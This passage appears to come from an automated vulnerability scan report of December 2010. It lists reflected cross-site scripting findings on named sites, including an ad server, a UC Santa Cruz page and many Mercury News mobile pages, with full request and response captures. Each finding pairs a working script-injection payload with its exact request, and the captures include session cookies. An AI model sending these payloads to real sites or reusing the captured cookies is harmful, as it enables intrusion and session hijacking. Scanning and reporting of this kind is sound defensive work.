GET /smartserve/ad?placement=pt-2576-003&invocation=1000&VS_cookie=CA9A14180625EFAA&cg5=IPOS&customer_indicator=N&referrer=fbd00*/alert(1)//48573649511&paidornatural=&searchterm=&random=10748355.416581035 HTTP/1.1 Host: http300.edge.ru4.com Proxy-Connection: keep-alive Referer: http://www.capitalone.com/directbanking/lp/interest-plus-online-savings-account/bluemosaic.php?itc=CAPITALONE11123PINTMKTGDF&number=D-fkxyq3cLcx6Ure8NAnH&external_id=WWW_124_ZZ_DB-ONL-CPM_LB_Z_Z_G_DB_27 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ru4.optout=true; X1ID=CC-00000000320688809; O62795=0; O15599=0
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://http300.edge.ru4.com/w3c/p3p.xml", CP="NON DSP COR TAIa PSAa PSDa OUR SAMa IND UNI PUR COM NAV DEM STA" Pragma: No-Cache Cache-Control: private, no-cache="Set-Cookie" Content-Type: text/html Date: Tue, 07 Dec 2010 23:04:49 GMT Connection: close
var xp_i1 = new Image(); var xp_i2 = new Image(); xp_i1.src = "http://http300.edge.ru4.com/smartserve/ttplus?placement=tp-0224-001&intr=C96"; xp_i2.src = "http://http300.edge.ru4.com/smartserve/ttplus ...[SNIP]... src='http://http300.edge.ru4.com/smartserve/ttplus?placement=tp-1525-015&multi&paidornatural=&testcell=&customer_indicator=N&cg5=IPOS&destination=&source=&location=&VS_cookie=CA9A14180625EFAA&referrer=fbd00*/alert(1)//48573649511&searchterm='; document.body.insertBefore(img2,document.body.firstChild); */ var xp1_qs = "&paidornatural=&testcell=&customer_indicator=N&cg5=IPOS&destination=&source=&location=&VS_cookie=CA9A14180625E ...[SNIP]...
The value of the referrer request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd01c"-alert(1)-"a4de3bd6ee was submitted in the referrer parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /smartserve/ad?placement=pt-2576-003&invocation=1000&VS_cookie=CA9A14180625EFAA&cg5=IPOS&customer_indicator=N&referrer=cd01c"-alert(1)-"a4de3bd6ee&paidornatural=&searchterm=&random=10748355.416581035 HTTP/1.1 Host: http300.edge.ru4.com Proxy-Connection: keep-alive Referer: http://www.capitalone.com/directbanking/lp/interest-plus-online-savings-account/bluemosaic.php?itc=CAPITALONE11123PINTMKTGDF&number=D-fkxyq3cLcx6Ure8NAnH&external_id=WWW_124_ZZ_DB-ONL-CPM_LB_Z_Z_G_DB_27 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ru4.optout=true; X1ID=CC-00000000320688809; O62795=0; O15599=0
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://http300.edge.ru4.com/w3c/p3p.xml", CP="NON DSP COR TAIa PSAa PSDa OUR SAMa IND UNI PUR COM NAV DEM STA" Pragma: No-Cache Cache-Control: private, no-cache="Set-Cookie" Content-Type: text/html Date: Tue, 07 Dec 2010 23:04:49 GMT Connection: close
var xp_i1 = new Image(); var xp_i2 = new Image(); xp_i1.src = "http://http300.edge.ru4.com/smartserve/ttplus?placement=tp-0224-001&intr=C92"; xp_i2.src = "http://http300.edge.ru4.com/smartserve/ttplus?placement=tp-1525-015&multi&paidornatural=&testcell=&customer_indicator=N&cg5=IPOS&destination=&source=&location=&VS_cookie=CA9A14180625EFAA&referrer=cd01c"-alert(1)-"a4de3bd6ee&searchterm=";
/* var img = document.createElement('img'); img.width=1; img.height=1; img.style.display='none'; img.src='http://http300.edge.ru4.com/smartserve/ttplus?placement=tp-0224-001&intr=C92';
The value of the searchterm request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60ba4"-alert(1)-"436384b182e was submitted in the searchterm parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /smartserve/ad?placement=pt-2576-003&invocation=1000&VS_cookie=CA9A14180625EFAA&cg5=IPOS&customer_indicator=N&referrer=&paidornatural=&searchterm=60ba4"-alert(1)-"436384b182e&random=10748355.416581035 HTTP/1.1 Host: http300.edge.ru4.com Proxy-Connection: keep-alive Referer: http://www.capitalone.com/directbanking/lp/interest-plus-online-savings-account/bluemosaic.php?itc=CAPITALONE11123PINTMKTGDF&number=D-fkxyq3cLcx6Ure8NAnH&external_id=WWW_124_ZZ_DB-ONL-CPM_LB_Z_Z_G_DB_27 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ru4.optout=true; X1ID=CC-00000000320688809; O62795=0; O15599=0
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://http300.edge.ru4.com/w3c/p3p.xml", CP="NON DSP COR TAIa PSAa PSDa OUR SAMa IND UNI PUR COM NAV DEM STA" Pragma: No-Cache Cache-Control: private, no-cache="Set-Cookie" Content-Type: text/html Date: Tue, 07 Dec 2010 23:04:50 GMT Connection: close
var xp_i1 = new Image(); var xp_i2 = new Image(); xp_i1.src = "http://http300.edge.ru4.com/smartserve/ttplus?placement=tp-0224-001&intr=C96"; xp_i2.src = "http://http300.edge.ru4.com/smartserve/ttplus?placement=tp-1525-015&multi&paidornatural=&testcell=&customer_indicator=N&cg5=IPOS&destination=&source=&location=&VS_cookie=CA9A14180625EFAA&referrer=&searchterm=60ba4"-alert(1)-"436384b182e";
4.45. http://its.ucsc.edu/terms/google_analytics.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://its.ucsc.edu
Path:
/terms/google_analytics.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 670d3"><img%20src%3da%20onerror%3dalert(1)>cdb91376758 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 670d3"><img src=a onerror=alert(1)>cdb91376758 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /terms/google_analytics.php/670d3"><img%20src%3da%20onerror%3dalert(1)>cdb91376758 HTTP/1.1 Host: its.ucsc.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 00:57:59 GMT Server: Apache X-Powered-By: PHP/5.1.6 Connection: close Content-Type: text/html Content-Length: 10764
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <HTML lang="en-us"> <HEAD> <TITLE>UC Santa Cruz - Information Technology Servic ...[SNIP]... <A href="../../terms/google_analytics.php/670d3"><img src=a onerror=alert(1)>cdb91376758"> ...[SNIP]...
4.46. http://its.ucsc.edu/terms/google_analytics.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://its.ucsc.edu
Path:
/terms/google_analytics.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffe6e"><script>alert(1)</script>96a3eba5b55 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /terms/google_analytics.php?ffe6e"><script>alert(1)</script>96a3eba5b55=1 HTTP/1.1 Host: its.ucsc.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 00:57:55 GMT Server: Apache X-Powered-By: PHP/5.1.6 Connection: close Content-Type: text/html Content-Length: 10647
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <HTML lang="en-us"> <HEAD> <TITLE>UC Santa Cruz - Information Technology Servic ...[SNIP]... <A href="../terms/google_analytics.php?&ffe6e"><script>alert(1)</script>96a3eba5b55=1"> ...[SNIP]...
The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload b0629<script>alert(1)</script>0b77686651d was submitted in the csid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gateway/gw.js?csid=H06572b0629<script>alert(1)</script>0b77686651d HTTP/1.1 Host: js.revsci.net Proxy-Connection: keep-alive Referer: http://www.carpricesecrets.com/page_footer_frame.php?vid=1&detid=1002&zip=&make=Mercury&make_id=28&model=&key=New+CPCLogic&body=&msrp=N%2FA&year=&page_category=landing Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: NETID01=optout; NETOPTOUT=true
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Last-Modified: Wed, 08 Dec 2010 00:13:31 GMT Cache-Control: max-age=86400, private Expires: Thu, 09 Dec 2010 00:13:31 GMT Content-Type: application/javascript;charset=ISO-8859-1 Date: Wed, 08 Dec 2010 00:13:31 GMT Content-Length: 128
/* * JavaScript include error: * The customer code "H06572B0629<SCRIPT>ALERT(1)</SCRIPT>0B77686651D" was not recognized. */
4.48. http://m.mercurynews.com/sjm/db_101028/contentdetail.htm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://m.mercurynews.com
Path:
/sjm/db_101028/contentdetail.htm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19f82"><script>alert(1)</script>4b108635a9a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sjm/db_101028/contentdetail.htm?contentguid=bfCKUWJb&detailindex=0&pn=0&ps=5&19f82"><script>alert(1)</script>4b108635a9a=1 HTTP/1.1 Host: m.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=3896C3AF838398CDCE09C5830EB2A7FA; s_cc=true; vrvcnt="72E607B105FD92B90780AF86D6953647_portalId:4_partnerId:2464_portalTerms:_up:false"; vrvweatherzip-2464=95192; s_sq=%5B%5BB%5D%5D; Coyote-2-c0a8af64=c0a8b06c:0; __qca=P0-326766520-1291762315669;
<?xml version="1.0"?> <!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
4.49. http://m.mercurynews.com/sjm/db_101028_index.htm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://m.mercurynews.com
Path:
/sjm/db_101028_index.htm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c06f1"><script>alert(1)</script>d1962495225 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sjm/db_101028_index.htm?c06f1"><script>alert(1)</script>d1962495225=1 HTTP/1.1 Host: m.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=3896C3AF838398CDCE09C5830EB2A7FA; s_cc=true; vrvcnt="72E607B105FD92B90780AF86D6953647_portalId:4_partnerId:2464_portalTerms:_up:false"; vrvweatherzip-2464=95192; s_sq=%5B%5BB%5D%5D; Coyote-2-c0a8af64=c0a8b06c:0; __qca=P0-326766520-1291762315669;
<?xml version="1.0"?> <!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
4.50. http://m.mercurynews.com/sjm/db_101030/contentdetail.htm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://m.mercurynews.com
Path:
/sjm/db_101030/contentdetail.htm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8abf6"><script>alert(1)</script>6270b4d5e06 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sjm/db_101030/contentdetail.htm?contentguid=j3yRrXfp&detailindex=0&pn=0&ps=5&8abf6"><script>alert(1)</script>6270b4d5e06=1 HTTP/1.1 Host: m.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=3896C3AF838398CDCE09C5830EB2A7FA; s_cc=true; vrvcnt="72E607B105FD92B90780AF86D6953647_portalId:4_partnerId:2464_portalTerms:_up:false"; vrvweatherzip-2464=95192; s_sq=%5B%5BB%5D%5D; Coyote-2-c0a8af64=c0a8b06c:0; __qca=P0-326766520-1291762315669;
<?xml version="1.0"?> <!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
4.51. http://m.mercurynews.com/sjm/db_101032_index.htm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://m.mercurynews.com
Path:
/sjm/db_101032_index.htm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52e1e"><script>alert(1)</script>d41c9dfa8d0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sjm/db_101032_index.htm?52e1e"><script>alert(1)</script>d41c9dfa8d0=1 HTTP/1.1 Host: m.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=3896C3AF838398CDCE09C5830EB2A7FA; s_cc=true; vrvcnt="72E607B105FD92B90780AF86D6953647_portalId:4_partnerId:2464_portalTerms:_up:false"; vrvweatherzip-2464=95192; s_sq=%5B%5BB%5D%5D; Coyote-2-c0a8af64=c0a8b06c:0; __qca=P0-326766520-1291762315669;
<?xml version="1.0"?> <!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
4.52. http://m.mercurynews.com/sjm/db_101036/contentdetail.htm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://m.mercurynews.com
Path:
/sjm/db_101036/contentdetail.htm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54547"><script>alert(1)</script>20e3f837658 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sjm/db_101036/contentdetail.htm?contentguid=vpuLbmlP&detailindex=0&pn=0&ps=5&54547"><script>alert(1)</script>20e3f837658=1 HTTP/1.1 Host: m.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=3896C3AF838398CDCE09C5830EB2A7FA; s_cc=true; vrvcnt="72E607B105FD92B90780AF86D6953647_portalId:4_partnerId:2464_portalTerms:_up:false"; vrvweatherzip-2464=95192; s_sq=%5B%5BB%5D%5D; Coyote-2-c0a8af64=c0a8b06c:0; __qca=P0-326766520-1291762315669;
<?xml version="1.0"?> <!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
4.53. http://m.mercurynews.com/sjm/db_101036_index.htm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://m.mercurynews.com
Path:
/sjm/db_101036_index.htm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 455d1"><script>alert(1)</script>e591c9d409d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sjm/db_101036_index.htm?455d1"><script>alert(1)</script>e591c9d409d=1 HTTP/1.1 Host: m.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=3896C3AF838398CDCE09C5830EB2A7FA; s_cc=true; vrvcnt="72E607B105FD92B90780AF86D6953647_portalId:4_partnerId:2464_portalTerms:_up:false"; vrvweatherzip-2464=95192; s_sq=%5B%5BB%5D%5D; Coyote-2-c0a8af64=c0a8b06c:0; __qca=P0-326766520-1291762315669;
<?xml version="1.0"?> <!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
4.54. http://m.mercurynews.com/sjm/db_101038/contentdetail.htm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://m.mercurynews.com
Path:
/sjm/db_101038/contentdetail.htm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2a20"><script>alert(1)</script>756b07ee7a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sjm/db_101038/contentdetail.htm?contentguid=9NUFyZNJ&detailindex=0&pn=0&ps=5&e2a20"><script>alert(1)</script>756b07ee7a8=1 HTTP/1.1 Host: m.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=3896C3AF838398CDCE09C5830EB2A7FA; s_cc=true; vrvcnt="72E607B105FD92B90780AF86D6953647_portalId:4_partnerId:2464_portalTerms:_up:false"; vrvweatherzip-2464=95192; s_sq=%5B%5BB%5D%5D; Coyote-2-c0a8af64=c0a8b06c:0; __qca=P0-326766520-1291762315669;
<?xml version="1.0"?> <!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
4.55. http://m.mercurynews.com/sjm/db_101041/contentdetail.htm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://m.mercurynews.com
Path:
/sjm/db_101041/contentdetail.htm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45697"><script>alert(1)</script>0c5b5d877c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sjm/db_101041/contentdetail.htm?contentguid=fOlsgQ8X&detailindex=0&pn=0&ps=5&45697"><script>alert(1)</script>0c5b5d877c=1 HTTP/1.1 Host: m.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=3896C3AF838398CDCE09C5830EB2A7FA; s_cc=true; vrvcnt="72E607B105FD92B90780AF86D6953647_portalId:4_partnerId:2464_portalTerms:_up:false"; vrvweatherzip-2464=95192; s_sq=%5B%5BB%5D%5D; Coyote-2-c0a8af64=c0a8b06c:0; __qca=P0-326766520-1291762315669;
<?xml version="1.0"?> <!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
4.56. http://m.mercurynews.com/sjm/db_101041_index.htm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://m.mercurynews.com
Path:
/sjm/db_101041_index.htm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e483d"><script>alert(1)</script>2dd65140bff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sjm/db_101041_index.htm?e483d"><script>alert(1)</script>2dd65140bff=1 HTTP/1.1 Host: m.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=3896C3AF838398CDCE09C5830EB2A7FA; s_cc=true; vrvcnt="72E607B105FD92B90780AF86D6953647_portalId:4_partnerId:2464_portalTerms:_up:false"; vrvweatherzip-2464=95192; s_sq=%5B%5BB%5D%5D; Coyote-2-c0a8af64=c0a8b06c:0; __qca=P0-326766520-1291762315669;
<?xml version="1.0"?> <!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
4.57. http://m.mercurynews.com/sjm/db_101043/contentdetail.htm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://m.mercurynews.com
Path:
/sjm/db_101043/contentdetail.htm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f633"><script>alert(1)</script>cbbb9beb498 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sjm/db_101043/contentdetail.htm?contentguid=NJ3OB094&detailindex=0&pn=0&ps=5&4f633"><script>alert(1)</script>cbbb9beb498=1 HTTP/1.1 Host: m.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=3896C3AF838398CDCE09C5830EB2A7FA; s_cc=true; vrvcnt="72E607B105FD92B90780AF86D6953647_portalId:4_partnerId:2464_portalTerms:_up:false"; vrvweatherzip-2464=95192; s_sq=%5B%5BB%5D%5D; Coyote-2-c0a8af64=c0a8b06c:0; __qca=P0-326766520-1291762315669;
<?xml version="1.0"?> <!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
4.58. http://m.mercurynews.com/sjm/db_101043_index.htm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://m.mercurynews.com
Path:
/sjm/db_101043_index.htm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c39e3"><script>alert(1)</script>a92c8ec891 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sjm/db_101043_index.htm?c39e3"><script>alert(1)</script>a92c8ec891=1 HTTP/1.1 Host: m.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=3896C3AF838398CDCE09C5830EB2A7FA; s_cc=true; vrvcnt="72E607B105FD92B90780AF86D6953647_portalId:4_partnerId:2464_portalTerms:_up:false"; vrvweatherzip-2464=95192; s_sq=%5B%5BB%5D%5D; Coyote-2-c0a8af64=c0a8b06c:0; __qca=P0-326766520-1291762315669;
<?xml version="1.0"?> <!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
4.59. http://m.mercurynews.com/sjm/db_101049/contentdetail.htm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://m.mercurynews.com
Path:
/sjm/db_101049/contentdetail.htm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b990a"><script>alert(1)</script>21271a9f18a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sjm/db_101049/contentdetail.htm?contentguid=l6Ndxsf3&detailindex=0&pn=0&ps=5&b990a"><script>alert(1)</script>21271a9f18a=1 HTTP/1.1 Host: m.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=3896C3AF838398CDCE09C5830EB2A7FA; s_cc=true; vrvcnt="72E607B105FD92B90780AF86D6953647_portalId:4_partnerId:2464_portalTerms:_up:false"; vrvweatherzip-2464=95192; s_sq=%5B%5BB%5D%5D; Coyote-2-c0a8af64=c0a8b06c:0; __qca=P0-326766520-1291762315669;
<?xml version="1.0"?> <!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
4.60. http://m.mercurynews.com/sjm/db_101049_index.htm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://m.mercurynews.com
Path:
/sjm/db_101049_index.htm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24376"><script>alert(1)</script>dd5a53769de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sjm/db_101049_index.htm?24376"><script>alert(1)</script>dd5a53769de=1 HTTP/1.1 Host: m.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=3896C3AF838398CDCE09C5830EB2A7FA; s_cc=true; vrvcnt="72E607B105FD92B90780AF86D6953647_portalId:4_partnerId:2464_portalTerms:_up:false"; vrvweatherzip-2464=95192; s_sq=%5B%5BB%5D%5D; Coyote-2-c0a8af64=c0a8b06c:0; __qca=P0-326766520-1291762315669;
<?xml version="1.0"?> <!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
4.61. http://m.mercurynews.com/sjm/db_101051/contentdetail.htm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://m.mercurynews.com
Path:
/sjm/db_101051/contentdetail.htm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab82a"><script>alert(1)</script>78ccedf2046 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
